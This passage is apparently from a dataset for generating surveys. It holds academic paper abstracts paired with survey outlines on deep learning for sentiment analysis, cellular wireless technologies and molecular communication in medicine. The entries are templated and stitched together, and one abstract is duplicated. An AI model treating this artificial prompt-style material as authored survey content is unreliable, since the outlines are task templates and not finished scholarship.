tagging, semantic relation identification, semantic relatedness) but not on others (named entity recognition, various forms of sentiment analysis). We discuss how these differences may be caused by the different role of word sense information in each of the tasks. The results highlight the importance of testing embedding models in real applications. --- paper_title: Predicting Polarities of Tweets by Composing Word Embeddings with Long Short-Term Memory paper_content: In this paper, we introduce Long ShortTerm Memory (LSTM) recurrent network for twitter sentiment prediction. With the help of gates and constant error carousels in the memory block structure, the model could handle interactions between words through a flexible compositional function. Experiments on a public noisy labelled data show that our model outperforms several feature-engineering approaches, with the result comparable to the current best data-driven technique. According to the evaluation on a generated negation phrase test set, the proposed architecture doubles the performance of non-neural model based on bag-of-word features. Furthermore, words with special functions (such as negation and transition) are distinguished and the dissimilarities of words with opposite sentiment are magnified. An interesting case study on negation expression processing shows a promising potential of the architecture dealing with complex sentiment phrases. --- paper_title: Learning Sentiment-Specific Word Embedding for Twitter Sentiment Classification paper_content: We present a method that learns word embedding for Twitter sentiment classification in this paper. Most existing algorithms for learning continuous word representations typically only model the syntactic context of words but ignore the sentiment of text. This is problematic for sentiment analysis as they usually map words with similar syntactic context but opposite sentiment polarity, such as good and bad, to neighboring word vectors. We address this issue by learning sentimentspecific word embedding (SSWE), which encodes sentiment information in the continuous representation of words. Specifically, we develop three neural networks to effectively incorporate the supervision from sentiment polarity of text (e.g. sentences or tweets) in their loss functions. To obtain large scale training corpora, we learn the sentiment-specific word embedding from massive distant-supervised tweets collected by positive and negative emoticons. Experiments on applying SSWE to a benchmark Twitter sentiment classification dataset in SemEval 2013 show that (1) the SSWE feature performs comparably with hand-crafted features in the top-performed system; (2) the performance is further improved by concatenating SSWE with existing feature set. --- paper_title: Unsupervised Word and Dependency Path Embeddings for Aspect Term Extraction paper_content: In this paper, we develop a novel approach to aspect term extraction based on unsupervised learning of distributed representations of words and dependency paths. The basic idea is to connect two words (w1 and w2) with the dependency path (r) between them in the embedding space. Specifically, our method optimizes the objective w1 + r = w2 in the low-dimensional space, where the multi-hop dependency paths are treated as a sequence of grammatical relations and modeled by a recurrent neural network. Then, we design the embedding features that consider linear context and dependency context information, for the conditional random field (CRF) based aspect term extraction. Experimental results on the SemEval datasets show that, (1) with only embedding features, we can achieve state-of-the-art results; (2) our embedding method which incorporates the syntactic information among words yields better performance than other representative ones in aspect term extraction. --- paper_title: Learning Word Vectors for Sentiment Analysis paper_content: Unsupervised vector-based approaches to semantics can model rich lexical meanings, but they largely fail to capture sentiment information that is central to many word meanings and important for a wide range of NLP tasks. We present a model that uses a mix of unsupervised and supervised techniques to learn word vectors capturing semantic term--document information as well as rich sentiment content. The proposed model can leverage both continuous and multi-dimensional sentiment information as well as non-sentiment annotations. We instantiate the model to utilize the document-level sentiment polarity annotations present in many online documents (e.g. star ratings). We evaluate the model using small, widely used sentiment and subjectivity corpora and find it out-performs several previously introduced methods for sentiment classification. We also introduce a large dataset of movie reviews to serve as a more robust benchmark for work in this area. --- paper_title: Sentiment Embeddings with Applications to Sentiment Analysis paper_content: We propose learning sentiment-specific word embeddings dubbed sentiment embeddings in this paper. Existing word embedding learning algorithms typically only use the contexts of words but ignore the sentiment of texts. It is problematic for sentiment analysis because the words with similar contexts but opposite sentiment polarity, such as good and bad , are mapped to neighboring word vectors. We address this issue by encoding sentiment information of texts (e.g., sentences and words) together with contexts of words in sentiment embeddings. By combining context and sentiment level evidences, the nearest neighbors in sentiment embedding space are semantically similar and it favors words with the same sentiment polarity. In order to learn sentiment embeddings effectively, we develop a number of neural networks with tailoring loss functions, and collect massive texts automatically with sentiment signals like emoticons as the training data. Sentiment embeddings can be naturally used as word features for a variety of sentiment analysis tasks without feature engineering. We apply sentiment embeddings to word-level sentiment analysis, sentence level sentiment classification, and building sentiment lexicons. Experimental results show that sentiment embeddings consistently outperform context-based embeddings on several benchmark datasets of these tasks. This work provides insights on the design of neural networks for learning task-specific word embeddings in other natural language processing tasks. --- paper_title: Sentiment classification based on supervised latent n-gram analysis paper_content: In this paper, we propose an efficient embedding for modeling higher-order (n-gram) phrases that projects the n-grams to low-dimensional latent semantic space, where a classification function can be defined. We utilize a deep neural network to build a unified discriminative framework that allows for estimating the parameters of the latent space as well as the classification function with a bias for the target classification task at hand. We apply the framework to large-scale sentimental classification task. We present comparative evaluation of the proposed method on two (large) benchmark data sets for online product reviews. The proposed method achieves superior performance in comparison to the state of the art. --- paper_title: Improving Twitter sentiment classification using topic-enriched multi-prototype word embeddings paper_content: It has been shown that learning distributed word representations is highly useful for Twitter sentiment classification. Most existing models rely on a single distributed representation for each word. This is problematic for sentiment classification because words are often polysemous and each word can contain different sentiment polarities under different topics. We address this issue by learning topic-enriched multi-prototype word embeddings (TMWE). In particular, we develop two neural networks which 1) learn word embeddings that better capture tweet context by incorporating topic information, and 2) learn topic-enriched multiple prototype embeddings for each word. Experiments on Twitter sentiment benchmark datasets in SemEval 2013 show that TMWE outperforms the top system with hand-crafted features, and the current best neural network model. --- paper_title: Sarcasm SIGN: Interpreting Sarcasm with Sentiment Based Monolingual Machine Translation paper_content: Sarcasm is a form of speech in which speakers say the opposite of what they truly mean in order to convey a strong sentiment. In other words,"Sarcasm is the giant chasm between what I say, and the person who doesn't get it.". In this paper we present the novel task of sarcasm interpretation, defined as the generation of a non-sarcastic utterance conveying the same message as the original sarcastic one. We introduce a novel dataset of 3000 sarcastic tweets, each interpreted by five human judges. Addressing the task as monolingual machine translation (MT), we experiment with MT algorithms and evaluation measures. We then present SIGN: an MT based sarcasm interpretation algorithm that targets sentiment words, a defining element of textual sarcasm. We show that while the scores of n-gram based automatic measures are similar for all interpretation models, SIGN's interpretations are scored higher by humans for adequacy and sentiment polarity. We conclude with a discussion on future research directions for our new task. --- paper_title: Are Word Embedding-based Features Useful for Sarcasm Detection? paper_content: This paper makes a simple increment to state-of-the-art in sarcasm detection research. Existing approaches are unable to capture subtle forms of context incongruity which lies at the heart of sarcasm. We explore if prior work can be enhanced using semantic similarity/discordance between word embeddings. We augment word embedding-based features to four feature sets reported in the past. We also experiment with four types of word embeddings. We observe an improvement in sarcasm detection, irrespective of the word embedding used or the original feature set to which our features are augmented. For example, this augmentation results in an improvement in F-score of around 4\% for three out of these four feature sets, and a minor degradation in case of the fourth, when Word2Vec embeddings are used. Finally, a comparison of the four embeddings shows that Word2Vec and dependency weight-based features outperform LSA and GloVe, in terms of their benefit to sarcasm detection. --- paper_title: A Deeper Look into Sarcastic Tweets Using Deep Convolutional Neural Networks paper_content: Sarcasm detection is a key task for many natural language processing tasks. In sentiment analysis, for example, sarcasm can flip the polarity of an "apparently positive" sentence and, hence, negatively affect polarity detection performance. To date, most approaches to sarcasm detection have treated the task primarily as a text categorization problem. Sarcasm, however, can be expressed in very subtle ways and requires a deeper understanding of natural language that standard text categorization techniques cannot grasp. In this work, we develop models based on a pre-trained convolutional neural network for extracting sentiment, emotion and personality features for sarcasm detection. Such features, along with the network's baseline features, allow the proposed models to outperform the state of the art on benchmark datasets. We also address the often ignored generalizability issue of classifying data that have not been seen by the models at learning phase. --- paper_title: Document Modeling with Gated Recurrent Neural Network for Sentiment Classification paper_content: Document level sentiment classification remains a challenge: encoding the intrinsic relations between sentences in the semantic meaning of a document. To address this, we introduce a neural network model to learn vector-based document representation in a unified, bottom-up fashion. The model first learns sentence representation with convolutional neural network or long short-term memory. Afterwards, semantics of sentences and their relations are adaptively encoded in document representation with gated recurrent neural network. We conduct document level sentiment classification on four large-scale review datasets from IMDB and Yelp Dataset Challenge. Experimental results show that: (1) our neural model shows superior performances over several state-of-the-art algorithms; (2) gated recurrent neural network dramatically outperforms standard recurrent neural network in document modeling for sentiment classification. 1 --- paper_title: A Question Answering Approach to Emotion Cause Extraction paper_content: Emotion cause extraction aims to identify the reasons behind a certain emotion expressed in text. It is a much more difficult task compared to emotion classification. Inspired by recent advances in using deep memory networks for question answering (QA), we propose a new approach which considers emotion cause identification as a reading comprehension task in QA. Inspired by convolutional neural networks, we propose a new mechanism to store relevant context in different memory slots to model context information. Our proposed approach can extract both word level sequence features and lexical features. Performance evaluation shows that our method achieves the state-of-the-art performance on a recently released emotion cause dataset, outperforming a number of competitive baselines by at least 3.01% in F-measure. --- paper_title: Emotional Chatting Machine: Emotional Conversation Generation with Internal and External Memory paper_content: Perception and expression of emotion are key factors to the success of dialogue systems or conversational agents. However, this problem has not been studied in large-scale conversation generation so far. In this paper, we propose Emotional Chatting Machine (ECM) that can generate appropriate responses not only in content (relevant and grammatical) but also in emotion (emotionally consistent). To the best of our knowledge, this is the first work that addresses the emotion factor in large-scale conversation generation. ECM addresses the factor using three new mechanisms that respectively (1) models the high-level abstraction of emotion expressions by embedding emotion categories, (2) captures the change of implicit internal emotion states, and (3) uses explicit emotion expressions with an external emotion vocabulary. Experiments show that the proposed model can generate responses appropriate not only in content but also in emotion. --- paper_title: Gated neural networks for targeted sentiment analysis paper_content: Targeted sentiment analysis classifies the sentiment polarity towards each target entity mention in given text documents. Seminal methods extract manual discrete features from automatic syntactic parse trees in order to capture semantic information of the enclosing sentence with respect to a target entity mention. Recently, it has been shown that competitive accuracies can be achieved without using syntactic parsers, which can be highly inaccurate on noisy text such as tweets. This is achieved by applying distributed word representations and rich neural pooling functions over a simple and intuitive segmentation of tweets according to target entity mentions. In this paper, we extend this idea by proposing a sentence-level neural model to address the limitation of pooling functions, which do not explicitly model tweet-level semantics. First, a bi-directional gated neural network is used to connect the words in a tweet so that pooling functions can be applied over the hidden layer instead of words for better representing the target and its contexts. Second, a three-way gated neural network structure is used to model the interaction between the target mention and its surrounding contexts. Experiments show that our proposed model gives significantly higher accuracies compared to the current best method for targeted sentiment analysis. --- paper_title: Using millions of emoji occurrences to learn any-domain representations for detecting sentiment, emotion and sarcasm paper_content: NLP tasks are often limited by scarcity of manually annotated data. In social media sentiment analysis and related tasks, researchers have therefore used binarized emoticons and specific hashtags as forms of distant supervision. Our paper shows that by extending the distant supervision to a more diverse set of noisy labels, the models can learn richer representations. Through emoji prediction on a dataset of 1246 million tweets containing one of 64 common emojis we obtain state-of-the-art performance on 8 benchmark datasets within sentiment, emotion and sarcasm detection using a single pretrained model. Our analyses confirm that the diversity of our emotional labels yield a performance improvement over previous distant supervision approaches. --- paper_title: Beyond object recognition: visual sentiment analysis with deep coupled adjective and noun neural networks paper_content: Visual sentiment analysis aims to automatically recognize positive and negative emotions from images. There are three main challenges, including large intra-class variance, fine-grained image categories, and scalability. Most existing methods predominantly focus on one or two challenges, which has limited their performance. In this paper, we propose a novel visual sentiment analysis approach with deep coupled adjective and noun neural networks. Specifically, to reduce the large intra-class variance, we first learn a shared middle-level sentiment representation by jointly learning an adjective and a noun deep neural network with weak label supervision. Second, based on the learned sentiment representation, a prediction network is further optimized to deal with the subtle differences which often exist in the fine-grained image categories. The three networks are trained in an end-to-end manner, where the middle-level representations learned in previous two networks can guide the sentiment network to achieve high performance and fast convergence. Third, we generalize the training with mutual supervision between the learned adjective and noun networks by a Rectified Kullback-Leibler loss (ReKL), when the adjective and noun labels are not available. Extensive experiments on two widely-used datasets show that our method outperforms the state-of-the-art on SentiBank dataset with 10.2% accuracy gain and surpasses the previous best approach on Twitter dataset with clear margins. --- paper_title: Using Deep and Convolutional Neural Networks for Accurate Emotion Classification on DEAP Dataset. paper_content: Emotion recognition is an important field of research in Brain Computer Interactions. As technology and the understanding of emotions are advancing, there are growing opportunities for automatic emotion recognition systems. Neural networks are a family of statistical learning models inspired by biological neural networks and are used to estimate functions that can depend on a large number of inputs that are generally unknown. In this paper we seek to use this effectiveness of Neural Networks to classify user emotions using EEG signals from the DEAP (Koelstra et al (2012)) dataset which represents the benchmark for Emotion classification research. We explore 2 different Neural Models, a simple Deep Neural Network and a Convolutional Neural Network for classification. Our model provides the state-of-the-art classification accuracy, obtaining 4.51 and 4.96 percentage point improvements over (Rozgic et al (2013)) classification of Valence and Arousal into 2 classes (High and Low) and 13.39 and 6.58 percentage point improvements over (Chung and Yoon(2012)) classification of Valence and Arousal into 3 classes (High, Normal and Low). Moreover our research is a testament that Neural Networks could be robust classifiers for brain signals, even outperforming traditional learning techniques. --- paper_title: Tensor Fusion Network for Multimodal Sentiment Analysis paper_content: Multimodal sentiment analysis is an increasingly popular research area, which extends the conventional language-based definition of sentiment analysis to a multimodal setup where other relevant modalities accompany language. In this paper, we pose the problem of multimodal sentiment analysis as modeling intra-modality and inter-modality dynamics. We introduce a novel model, termed Tensor Fusion Network, which learns both such dynamics end-to-end. The proposed approach is tailored for the volatile nature of spoken language in online videos as well as accompanying gestures and voice. In the experiments, our model outperforms state-of-the-art approaches for both multimodal and unimodal sentiment analysis. --- paper_title: Select-additive learning: Improving generalization in multimodal sentiment analysis paper_content: Multimodal sentiment analysis is drawing an increasing amount of attention these days. It enables mining of opinions in video reviews which are now available aplenty on online platforms. However, multimodal sentiment analysis has only a few high-quality data sets annotated for training machine learning algorithms. These limited resources restrict the generalizability of models, where, for example, the unique characteristics of a few speakers (e.g., wearing glasses) may become a confounding factor for the sentiment classification task. In this paper, we propose a Select-Additive Learning (SAL) procedure that improves the generalizability of trained neural networks for multimodal sentiment analysis. In our experiments, we show that our SAL approach improves prediction accuracy significantly in all three modalities (verbal, acoustic, visual), as well as in their fusion. Our results show that SAL, even when trained on one dataset, achieves good generalization across two new test datasets. --- paper_title: Visual Sentiment Analysis by Attending on Local Image Regions paper_content: Visual sentiment analysis, which studies the emotional response of humans on visual stimuli such as images and videos, has been an interesting and challenging problem. It tries to understand the high-level content of visual data. The success of current models can be attributed to the development of robust algorithms from computer vision. Most of the existing models try to solve the problem by proposing either robust features or more complex models. In particular, visual features from the whole image or video are the main proposed inputs. Little attention has been paid to local areas, which we believe is pretty relevant to human's emotional response to the whole image. In this work, we study the impact of local image regions on visual sentiment analysis. Our proposed model utilizes the recent studied attention mechanism to jointly discover the relevant local regions and build a sentiment classifier on top of these local regions. The experimental results suggest that 1) our model is capable of automatically discovering sentimental local regions of given images and 2) it outperforms existing state-of-the-art algorithms to visual sentiment analysis. --- paper_title: Intersubjectivity and sentiment: from language to knowledge paper_content: Intersubjectivity is an important concept in psychology and sociology. It refers to sharing conceptualizations through social interactions in a community and using such shared conceptualization as a resource to interpret things that happen in everyday life. In this work, we make use of intersubjectivity as the basis to model shared stance and subjectivity for sentiment analysis. We construct an intersubjectivity network which links review writers, terms they used, as well as the polarities of the terms. Based on this network model, we propose a method to learn writer embeddings which are subsequently incorporated into a convolutional neural network for sentiment analysis. Evaluations on the IMDB, Yelp 2013 and Yelp 2014 datasets show that the proposed approach has achieved the state-of-the-art performance. --- paper_title: Stance Detection with Bidirectional Conditional Encoding paper_content: Stance detection is the task of classifying the attitude expressed in a text towards a target such as Hillary Clinton to be "positive", negative" or "neutral". Previous work has assumed that either the target is mentioned in the text or that training data for every target is given. This paper considers the more challenging version of this task, where targets are not always mentioned and no training data is available for the test targets. We experiment with conditional LSTM encoding, which builds a representation of the tweet that is dependent on the target, and demonstrate that it outperforms encoding the tweet and the target independently. Performance is improved further when the conditional model is augmented with bidirectional encoding. We evaluate our approach on the SemEval 2016 Task 6 Twitter Stance Detection corpus achieving performance second best only to a system trained on semi-automatically labelled tweets for the test target. When such weak supervision is added, our approach achieves state-of-the-art results. --- paper_title: Volatility Prediction using Financial Disclosures Sentiments with Word Embedding-based IR Models paper_content: Volatility prediction--an essential concept in financial markets--has recently been addressed using sentiment analysis methods. We investigate the sentiment of annual disclosures of companies in stock markets to forecast volatility. We specifically explore the use of recent Information Retrieval (IR) term weighting models that are effectively extended by related terms using word embeddings. In parallel to textual information, factual market data have been widely used as the mainstream approach to forecast market risk. We therefore study different fusion methods to combine text and market data resources. Our word embedding-based approach significantly outperforms state-of-the-art methods. In addition, we investigate the characteristics of the reports of the companies in different financial sectors. ---
Title: Deep Learning for Sentiment Analysis: A Survey Section 1: Introduction Description 1: This section provides an overview of sentiment analysis, its importance, and how deep learning has been leveraged in this domain. Section 2: Deep Learning Description 2: This section discusses the resurgence of neural networks, particularly deep learning models, in various application domains including sentiment analysis. Section 3: Word Embedding Description 3: This section explains the technique of word embedding and its significance for deep learning models in natural language processing tasks. Section 4: Autoencoder and Denoising Autoencoder Description 4: This section describes the architecture and functionality of Autoencoders and Denoising Autoencoders in learning representations. Section 5: Convolutional Neural Network Description 5: This section covers the basics of Convolutional Neural Networks (CNN) and how they are adapted for text and sentiment analysis. Section 6: Recurrent Neural Network Description 6: This section explains the structure and advantages of Recurrent Neural Networks (RNN) and its variants like Bidirectional RNN for sequential data processing. Section 7: LSTM Network Description 7: This section presents Long Short Term Memory networks (LSTM), detailing their unique capabilities in handling long-term dependencies in data. Section 8: Attention Mechanism with Recurrent Neural Network Description 8: This section delves into the attention mechanism, exploring how it enhances the performance of RNNs in processing long-range dependencies. Section 9: Memory Network Description 9: This section explains the concept and working of Memory Networks, focusing on their application in NLP tasks including question answering. Section 10: Recursive Neural Network Description 10: This section discusses Recursive Neural Networks (RecNN) and their application in structured data analysis such as parsing trees. Section 11: Sentiment Analysis Tasks Description 11: This section introduces the main tasks in sentiment analysis, categorized into document level, sentence level, and aspect level. Section 12: Document Level Sentiment Classification Description 12: This section covers approaches and deep learning models used for classifying sentiments at the document level. Section 13: Sentence Level Sentiment Classification Description 13: This section reviews techniques and models for determining sentiment within individual sentences. Section 14: Aspect Level Sentiment Classification Description 14: This section focuses on classifying sentiment related to specific aspects within a text, covering techniques to manage context and target interactions. Section 15: Aspect Extraction and Categorization Description 15: This section details methods and models for extracting and categorizing aspects or targets in sentiment analysis. Section 16: Opinion Expression Extraction Description 16: This section outlines deep learning approaches for identifying opinion expressions within texts. Section 17: Sentiment Composition Description 17: This section discusses how deep learning models determine the sentiment orientation of compositions in language. Section 18: Opinion Holder Extraction Description 18: This section explains methods for extracting the opinion holder, identifying the source of sentiments. Section 19: Temporal Opinion Mining Description 19: This section covers techniques used for analyzing opinions over time and predicting future sentiments. Section 20: Sentiment Analysis with Word Embedding Description 20: This section highlights the importance of sentiment-encoded word embeddings in improving sentiment analysis models. Section 21: Sarcasm Analysis Description 21: This section reviews deep learning models specifically designed for detecting sarcasm in text data. Section 22: Emotion Analysis Description 22: This section explores deep learning approaches used to analyze emotions, detailing models beyond sentiment classification. Section 23: Multimodal Data for Sentiment Analysis Description 23: This section examines the use of multimodal data (text, visual, acoustic) in sentiment analysis and the corresponding deep learning models. Section 24: Resource-Poor Language and Multilingual Sentiment Analysis Description 24: This section presents deep learning applications in sentiment analysis for resource-poor languages and multilingual settings. Section 25: Other Related Tasks Description 25: This section highlights additional sentiment analysis-related tasks where deep learning applications have been explored. Section 26: Conclusion Description 26: This section summarizes the contributions of deep learning to sentiment analysis and outlines potential future research directions.
Survey of Latest Wireless Cellular Technologies for Enhancement of Spectral Density at Reduced Cost
9
--- paper_title: Block Acquisition of Weak GPS Signals in a Software Receiver paper_content: Block algorithms have been developed to acquire very weak Global Positioning System (GPS) coarse/acquisition (C/A) signals in a software receiver. These algorithms are being developed in order to enable the use of weak GPS signals in applications such as geostationary orbit determination. The algorithms average signals over multiple GPS data bits after a squaring operation that removes the bits’ signs. Methods have been developed to ensure that the pre-squaring summation intervals do not contain data bit transitions. The algorithms make judicious use of Fast Fourier Transform (FFT) and inverse FFT (IFFT) techniques in order to speed up operations. Signals have been successfully acquired from 4 seconds worth of bitgrabbed data with signal-to-noise ratios (SNRs) as low as 21 dB Hz. --- paper_title: Bandwidth optimization control protocol for 4G wireless mobile internet paper_content: Our proposed Bandwidth Optimization Control Protocol allows a mobile node to send request and get reply using two different networks simultaneously. Connection supply for mobile nodes is not done by modifying transport layer protocols, but by handling the update of routing table at the Internet layer using bandwidth optimization control protocol messages, options, and processes that ensure the correct delivery of request and reply. The result from our simulation shows that the mobile node is getting higher data rates and efficiently utilizes network resources as compared to using single network. --- paper_title: Significance of Nanotechnology for Future Wireless Devices and Communications paper_content: This paper reviews the expected wide and profound impact of nanotechnology for future wireless devices and communication technologies. --- paper_title: Hierarchical cell structures with adaptive radio resource management paper_content: In order to increase the growing capacity demands of cellular mobile communication systems, cell splitting will be applied and/or small pico-cells will be established, since both measures can increase spectral efficiency. Hierarchical cellular networks have been suggested previously to overcome the inherent disadvantage of an increased number of handoffs, which both cell splitting and small pico-cells, bring about. A critical question with respect to hierarchical cellular networks is how to divide the available radio resources (i.e. frequencies, channels) among the micro- and macro-cell layers in an optimal way. Another important aspect is the optimal choice of a threshold velocity above which users are assigned to the macro-cell layer Most research in this area so far has dealt with those issues in a static way, assuming fixed traffic and mobility parameters. However in order to be able to adapt the system parameters to temporal and spatial changes of traffic and mobility properties, in this paper two adaptive algorithms are described, which control the threshold velocity as well as the division of resources among the layers, dynamically. The performance of those algorithms is evaluated by means of computer simulations. --- paper_title: 5G Based on Cognitive Radio paper_content: Both the cognitive radio (CR) and the fifth generation of cellular wireless standards (5G) are considered to be the future technologies: on one hand, CR offers the possibility to significantly increase the spectrum efficiency, by smart secondary users (CR users) using the free licensed users spectrum holes; on the other hand, the 5G implies the whole wireless world interconnection (WISDOM--Wireless Innovative System for Dynamic Operating Megacommunications concept), together with very high data rates Quality of Service (QoS) service applications. In this paper, they are combined together into a "CR based 5G". With this aim, two novel ideas are advanced: the 5G terminal is a CR terminal and the CR technology is chosen for WISDOM concept. Thus, the 5G takes CR flexibility and adaptability and makes the first step through a commercial and tangible form. --- paper_title: Smart antennas for future reconfigurable wireless communication networks paper_content: Smart antenna technology is being considered for mobile platforms such as automobiles, cellular telephones (mobile unit), laptops, etc. This paper examines and integrates antenna array characteristics, digital signal processing algorithms (for adaptive beamforming), and the impact of these on the network throughput. The results presented here are part of a project on reconfigurable broadband (high-speed) networks. --- paper_title: Smart Antenna Algorithms for WCDMA Mobile Communication Systems paper_content: The goal of 3 rd generation systems is to integrate a wide variety of communication services such as high speed data, video and multimedia traffic as well as voice signals. WCDMA as the radio access technology for the 3G has many advantages such as highly efficient spectrum utilization and variable user data rates. Smart antenna technologies are very important for the system implementation. Smart Antennas serve different users by radiating narrow beams. The same frequency can be reused even if the users are in the same cell or the users are well separated. Thus the capacity of the system is increased by implementing this additional intra cell reuse. This paper discusses algorithms developed for smart antenna applications to WCDMA. The Direct Matrix Inversion Algorithm and RLS algorithms are the two adaptive beam forming algorithms used in smart antennas. Simulation results show that convergence is faster in the RLS algorithm than in the DMI algorithm. --- paper_title: Bandwidth optimization control protocol for 4G wireless mobile internet paper_content: Our proposed Bandwidth Optimization Control Protocol allows a mobile node to send request and get reply using two different networks simultaneously. Connection supply for mobile nodes is not done by modifying transport layer protocols, but by handling the update of routing table at the Internet layer using bandwidth optimization control protocol messages, options, and processes that ensure the correct delivery of request and reply. The result from our simulation shows that the mobile node is getting higher data rates and efficiently utilizes network resources as compared to using single network. ---
Title: Survey of Latest Wireless Cellular Technologies for Enhancement of Spectral Density at Reduced Cost Section 1: Introduction Description 1: Write about the evolution and core requirements of mobile devices in the context of ubiquitous ambient intelligence. Section 2: First Generation (1G)-Analog System Description 2: Describe the characteristics and limitations of the first generation wireless mobile communication system. Section 3: Orthogonal Frequency Division Multiplexing (OFDM) Description 3: Discuss the features, applications, and benefits of OFDM technology in wireless communication. Section 4: Software Defined Radio Description 4: Explain the principles, benefits, and implementation of Software Defined Radio (SDR) for wireless systems. Section 5: 5G Concept Description 5: Provide an overview of the 5G technology, its objectives, cognitive radio integration, and its benefits. Section 6: Benefit of Nanotechnology Description 6: Describe how nanotechnology can address various challenges in wireless communication systems, including power efficiency and thermal management. Section 7: Hierarchical System Description 7: Discuss the hierarchical cellular networks, including macro cells, micro cells, and pico cells, and their impact on spectral efficiency. Section 8: Proposed Network Description 8: Outline the proposed network based on smart antenna, MC-CDMA, and OFDMA technologies to enhance spectral density and reduce costs. Section 9: Conclusion Description 9: Summarize the survey of 1G to 4G, 5G, and CR technologies and provide a roadmap for future 5G, 6G, and 7G networks.
Applications of molecular communications to medicine: a survey
6
--- paper_title: Sequence-Specific Peptide Synthesis by an Artificial Small-Molecule Machine paper_content: The ribosome builds proteins by joining together amino acids in an order determined by messenger RNA. Here, we report on the design, synthesis, and operation of an artificial small-molecule machine that travels along a molecular strand, picking up amino acids that block its path, to synthesize a peptide in a sequence-specific manner. The chemical structure is based on a rotaxane, a molecular ring threaded onto a molecular axle. The ring carries a thiolate group that iteratively removes amino acids in order from the strand and transfers them to a peptide-elongation site through native chemical ligation. The synthesis is demonstrated with ~1018 molecular machines acting in parallel; this process generates milligram quantities of a peptide with a single sequence confirmed by tandem mass spectrometry. --- paper_title: Characterization of signal propagation in neuronal systems for nanomachine-to-neurons communications paper_content: In the next decade nanocommunications will have great impact on biomedical engineering applications, for example in the view of allowing rehabilitation of patients which suffer for irreversible damage to the vertebral column. In such a case, the impossibility to move caused by an interruption in the propagation of nervous impulses, could be solved by exploiting nanomachines that employ the same communication paradigm of neurons to interact with them, thus allowing signal propagation across the body critical area. Accordingly, in this paper we perform a characterization and provide a model of the signal propagation between two entities which use a neuronal paradigm of communication, e.g. two neurons or a neuron and a nanomachine, so as to derive expressions of the transfer function, gain and delay incurred during the transmission. This could allow to design nanomachines compatible with the biological structures and able to integrate and substitute them when needed. --- paper_title: From P0 to P6 medicine, a model of highly participatory, narrative, interactive, and “augmented” medicine: some considerations on Salvatore Iaconesi’s clinical story paper_content: Salvatore Iaconesi was recently diagnosed with a brain tumor. He decided to share his clinical records not only with doctors but with everybody who wishes to find him a cure. “Because cure is not unique,” he emphasizes “there are cures for the body and cures for the soul, and everyone, from a painter to a musician, can find me a cure. Please, feel free to take my clinical history for example and let it become a game, a video, a music, a picture, whatever you like.” The emblematic hallmark of the changing times, Salvatore Iaconesi’s case is an example of how many profound revolutions and steps medicine has undertaken during the past few centuries. Stemming from a form of remote medical paternalism and arriving at the concept of a therapeutic alliance, medicine nowadays faces challenges and opportunities at a level before unforeseeable and unimaginable. The new concept of P6 medicine (personalized, predictive, preventive, participatory, psychocognitive, and public) is discussed, together with its profound implications. --- paper_title: Joint Energy Harvesting and Communication Analysis for Perpetual Wireless Nanosensor Networks in the Terahertz Band paper_content: Wireless nanosensor networks (WNSNs) consist of nanosized communicating devices, which can detect and measure new types of events at the nanoscale. WNSNs are the enabling technology for unique applications such as intrabody drug delivery systems or surveillance networks for chemical attack prevention. One of the major bottlenecks in WNSNs is posed by the very limited energy that can be stored in a nanosensor mote in contrast to the energy that is required by the device to communicate. Recently, novel energy harvesting mechanisms have been proposed to replenish the energy stored in nanodevices. With these mechanisms, WNSNs can overcome their energy bottleneck and even have infinite lifetime (perpetual WNSNs), provided that the energy harvesting and consumption processes are jointly designed. In this paper, an energy model for self-powered nanosensor motes is developed, which successfully captures the correlation between the energy harvesting and the energy consumption processes. The energy harvesting process is realized by means of a piezoelectric nanogenerator, for which a new circuital model is developed that can accurately reproduce existing experimental data. The energy consumption process is due to the communication among nanosensor motes in the terahertz band (0.1-10 THz). The proposed energy model captures the dynamic network behavior by means of a probabilistic analysis of the total network traffic and the multiuser interference. A mathematical framework is developed to obtain the probability distribution of the nanosensor mote energy and to investigate the end-to-end successful packet delivery probability, the end-to-end packet delay, and the achievable throughput of WNSNs. Nanosensor motes have not been built yet and, thus, the development of an analytical energy model is a fundamental step toward the design of WNSNs architectures and protocols. --- paper_title: A simulation tool for nanoscale biological networks paper_content: a b s t r a c t Nanonetworking is a new interdisciplinary research area including nanotechnology, biotechnology, and ICT. In this paper, we present a novel simulation platform designed for modeling information exchange at nanoscales. This platform is adaptable to any kind of nano bearer, i.e. any mechanism used to transport information, such as electromagnetic waves or calcium ions. Moreover, it includes a set of configuration functions in order to adapt to different types of biological environments. In this paper, we provide a throughout description of the simulation libraries. In addition, we demonstrate their capabilities by modeling a section of a lymph node and the information transfer within it, which happens between antibody molecules produced by the immune system during the humoral immune response. --- paper_title: Diffusion-based Physical Channel Identification in Molecular Nanonetworks paper_content: Catala: El treball es una exploracio del canal de difusio molecular per nanoredes moleculars, en el qual s'identifica la resposta impulsional i en frequencia del canal, es comprova la seva linealitat i invariancia i s'extreuen les principals caracteristiques de comunicacio. S'avaluen diferents tecniques de modulacio. --- paper_title: Simulating Wireless Nano Sensor Networks in the NS-3 Platform paper_content: The Wireless nanosensor network paradigm is rapidly gaining the attention of researchers within the scientific and industrial communities, thanks to the progress of nanotechnology. The envisioned concept is based on integrated machines at the nano scale, which interact on cooperative basis by means of wireless communications. At the present stage, the design of the protocol suite for wireless nanosensor networks represents a fundamental issue to address for accelerating the deployment process of such a technology. In this direction, the availability of an open source simulator would be surely of help in the development of participated design methodologies, in enforcing the collaboration among different teams, and in easing the verifiability of scientific outcomes. Despite the evident advantages that such a platform could bring, currently available tools only support molecular-based approaches without accounting for the relevant impact that electromagnetic communications may have in this field. To cover this lack, the present contribution proposes a modular and easy upgradeable simulation platform, intended for wireless nanosensor networks based on electromagnetic communication in the terahertz band. Preliminary results drawn from a a simple, yet significant, health monitoring scenario are also provided along with a study on computational requirements and future upgrades. --- paper_title: A systems-theoretic model of a biological circuit for molecular communication in nanonetworks paper_content: Abstract Recent advances in synthetic biology, in particular towards the engineering of DNA-based circuits, are providing tools to program man-designed functions within biological cells, thus paving the way for the realization of biological nanoscale devices, known as nanomachines. By stemming from the way biological cells communicate in the nature, Molecular Communication (MC), i.e., the exchange of information through the emission, propagation, and reception of molecules, has been identified as the key paradigm to interconnect these biological nanomachines into nanoscale networks, or nanonetwork. The design of MC nanonetworks built upon biological circuits is particularly interesting since cells possess many of the elements required to realize this type of communication, thus enabling the design of cooperative functions in the biological environment. In this paper, a systems-theoretic modeling is realized by analyzing a minimal subset of biological circuit elements necessary to be included in an MC nanonetwork design where the message-bearing molecules are propagated via free diffusion between two cells. The obtained system-theoretic models stem from the biochemical processes underlying cell-to-cell MC, and are analytically characterized by their transfer functions, attenuation and delay experienced by an information signal exchanged by the communicating cells. 